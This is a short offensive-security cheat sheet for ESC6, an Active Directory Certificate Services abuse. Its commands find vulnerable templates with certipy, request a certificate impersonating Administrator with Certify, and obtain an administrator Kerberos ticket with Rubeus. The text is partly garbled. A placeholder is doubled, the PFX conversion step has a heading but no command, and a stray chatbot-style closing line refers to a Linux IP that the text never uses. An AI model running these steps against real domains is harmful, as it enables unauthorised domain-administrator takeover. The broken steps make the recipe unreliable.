Skip to main content

ESC6

Linux

Certificate Request with an alternative UPN

bob$ certipy find -u 'user1@minions.com' -p 'password1' -dc-ip <ip> -vulnerable -stdout

Windows

Request a certificate abusing ESC6

PS /home/bobbuilder> .\Certify.exe request /ca:DC.minions.com\CA-minions<ca_name> /template:<templatetemplate_name> /altname:Administrator

Convert certificate to PFX

Get a TGT as the Administrator Account

PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx

Replace <linux_ip> with the actual Linux IP address. Let me know if you need further assistance!